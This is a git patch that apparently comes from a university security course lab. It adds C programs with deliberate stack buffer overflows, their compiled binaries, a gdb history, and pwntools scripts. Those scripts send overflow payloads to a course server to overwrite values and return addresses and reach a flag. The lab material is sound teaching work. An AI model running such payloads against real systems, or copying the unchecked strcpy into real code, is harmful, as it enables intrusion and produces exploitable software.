From 82b7b8c565c98c26bb8b6b55ce254855adbe7e15 Mon Sep 17 00:00:00 2001
From: Diogo Diniz <diogocruzdiniz@gmail.com>
Date: Sat, 20 Dec 2025 15:44:03 +0000
Subject: [PATCH] Partial lab6

---
 pa/lab6/.gdb_history                  | 119 ++++++++++++++++++++++++++
 pa/lab6/chall_calling_functions.py    |  12 +++
 pa/lab6/chall_match_an_exact_value.py |  10 +++
 pa/lab6/chall_return_address.py       |  12 +++
 pa/lab6/chall_simple_overflow.py      |  10 +++
 pa/lab6/chall_super_secure_system.py  |  15 ++++
 pa/lab6/check                         | Bin 0 -> 10524 bytes
 pa/lab6/check.c                       |  30 +++++++
 pa/lab6/functions                     | Bin 0 -> 10464 bytes
 pa/lab6/functions.c                   |  27 ++++++
 pa/lab6/match.c                       |  24 ++++++
 pa/lab6/return                        | Bin 0 -> 10552 bytes
 pa/lab6/return.c                      |  22 +++++
 pa/lab6/simple                        | Bin 0 -> 10368 bytes
 pa/lab6/simple.c                      |  23 +++++
 15 files changed, 304 insertions(+)
 create mode 100644 pa/lab6/.gdb_history
 create mode 100644 pa/lab6/chall_calling_functions.py
 create mode 100644 pa/lab6/chall_match_an_exact_value.py
 create mode 100644 pa/lab6/chall_return_address.py
 create mode 100644 pa/lab6/chall_simple_overflow.py
 create mode 100644 pa/lab6/chall_super_secure_system.py
 create mode 100755 pa/lab6/check
 create mode 100644 pa/lab6/check.c
 create mode 100644 pa/lab6/functions
 create mode 100644 pa/lab6/functions.c
 create mode 100644 pa/lab6/match.c
 create mode 100644 pa/lab6/return
 create mode 100644 pa/lab6/return.c
 create mode 100755 pa/lab6/simple
 create mode 100644 pa/lab6/simple.c

diff --git a/pa/lab6/.gdb_history b/pa/lab6/.gdb_history
new file mode 100644
index 0000000..1397fad
--- /dev/null
+++ b/pa/lab6/.gdb_history
@@ -0,0 +1,119 @@
+disas main
+disas win
+disas main
+q
+disas challenge 
+disas win
+q
+disas challenge 
+q
+p /x &buffer
+disas challenge
+q
+disas challenge 
+q
+q
+disas main 
+disas check_password
+q
+disas check_password
+q
+q
+disas check_password
+q
+disas check_password 
+q
+disassemble challenge 
+q
+disas check_password
+q
+disas main
+q
+disas main
+disas check_password 
+q
+b main
+r
+b check_password 
+c
+stack 50
+disas check_
+disas check_password 
+r
+a
+c
+disas check_password 
+b 0x08048731
+b *0x08048731
+r
+c
+p /x $ebx
+c
+stack 50
+q
+disas main
+q
+disas check_password 
+q
+b *0x08048731
+r
+si
+stack 50
+q
+b *0x08048731
+r
+p $ebp
+q
+attach 103318
+b *0x08048731
+c
+stack 50
+b *(0x804874d+5)
+c
+stack 50
+q
+attach 104773
+disas check_
+disas check_password 
+b *0x08048738
+c
+b * 0x8048752
+stack 30
+c
+stack 30
+q
+attach 106286
+disas check_password 
+b *0x08048735
+p *0x08048752
+b *0x08048752
+c
+si
+stack 50
+q
+attach 107369
+b *0x08048735
+b *0x08048752
+c
+si
+stack 30
+c
+si
+stack 30
+c
+q
+attach 111389
+b *0x08048752
+b *0x08048735
+c
+stack 30
+si
+stack 30
+next
+stack 20
+i 
+if
+i f
+stack
+disas check_password 
+q
diff --git a/pa/lab6/chall_calling_functions.py b/pa/lab6/chall_calling_functions.py
new file mode 100644
index 0000000..1bf8a16
--- /dev/null
+++ b/pa/lab6/chall_calling_functions.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25153
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_match_an_exact_value.py b/pa/lab6/chall_match_an_exact_value.py
new file mode 100644
index 0000000..fa4088e
--- /dev/null
+++ b/pa/lab6/chall_match_an_exact_value.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25152
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*64 + b"dcba\n")
+conn.interactive()
diff --git a/pa/lab6/chall_return_address.py b/pa/lab6/chall_return_address.py
new file mode 100644
index 0000000..ffbf47e
--- /dev/null
+++ b/pa/lab6/chall_return_address.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25154
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("'\n")
+conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_simple_overflow.py b/pa/lab6/chall_simple_overflow.py
new file mode 100644
index 0000000..cb99bd9
--- /dev/null
+++ b/pa/lab6/chall_simple_overflow.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25151
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("0.\n")
+conn.send(b"\x55"*128 + b"\x01\n")
+conn.interactive()
diff --git a/pa/lab6/chall_super_secure_system.py b/pa/lab6/chall_super_secure_system.py
new file mode 100644
index 0000000..e987988
--- /dev/null
+++ b/pa/lab6/chall_super_secure_system.py
@@ -0,0 +1,15 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25155
+
+WIN_ADDR = p32(0x080487d9)
+EBX = p32(0x804a001) # Has NULL byte
+EBP = p32(0xffffcdd8)
+
+#conn = process("./check")
+conn = remote(HOST, PORT)
+pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
+input()
+conn.send(pl)
+conn.interactive()
diff --git a/pa/lab6/check b/pa/lab6/check
new file mode 100755
index 0000000000000000000000000000000000000000..002c2eb4a56c4b54694790be37ac241b6983deb2
GIT binary patch
literal 10524
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
O@Af4^^lBw^I{SY?GM|0`

literal 0
HcmV?d00001

diff --git a/pa/lab6/check.c b/pa/lab6/check.c
new file mode 100644
index 0000000..969ebcb
--- /dev/null
+++ b/pa/lab6/check.c
@@ -0,0 +1,30 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+int check_password(char* password) {
+  char buffer[32];
+
+  strcpy(buffer, password);
+
+  if(strcmp(buffer, getflag()) == 0)
+    return 1;
+
+  return 0;
+}
+
+int main() {
+  init();
+
+  char pass[64] = {0};
+  // we know how to make this secure. No gets in here.
+  read(0, pass, 63);
+
+  if(check_password(pass)){
+      printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag());
+  } else {
+      printf("Unauthorized user/passwd\n");
+  }
+}
diff --git a/pa/lab6/functions b/pa/lab6/functions
new file mode 100644
index 0000000000000000000000000000000000000000..0ad9bfbf7fc41f40a25755173c7e7b906ee72d07
GIT binary patch
literal 10464
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
